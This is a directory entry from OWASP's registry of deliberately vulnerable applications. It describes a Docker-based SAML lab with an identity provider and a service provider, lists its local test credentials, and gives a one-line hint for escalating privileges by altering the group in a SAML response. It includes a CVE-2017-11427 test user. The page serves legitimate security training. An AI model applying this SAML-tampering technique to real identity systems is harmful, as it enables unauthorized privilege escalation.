(opens in new window)

OWASP Vulnerable Web Applications Directory

An OWASP production project

A comprehensive registry of known vulnerable web and mobile applications for legal security testing and training.

Vulnerable SAML App

Vulnerable SAML infrastructure: IDP and SP Docker images showcasing exploitable SAML configurations (e.g. privilege escalation by changing group in SAML response). Based on modified OneLogin Python SAML library; includes CVE-2017-11427 test user.

Collections offline
Technology Python PHP Docker SAML
Categories Free-form Single-player
Author yogisec
Stars 54 stars
Last contribution Nov 2, 2020 2y +
Link

Notes

docker-compose up; app at http://127.0.0.1:8000. Users: yogi/bear (unprivileged), admin/(typo password in README), brubble/password (CVE), instructor/(see README). Upgrade yogi to admin by changing group in SAML message.

← Back to directory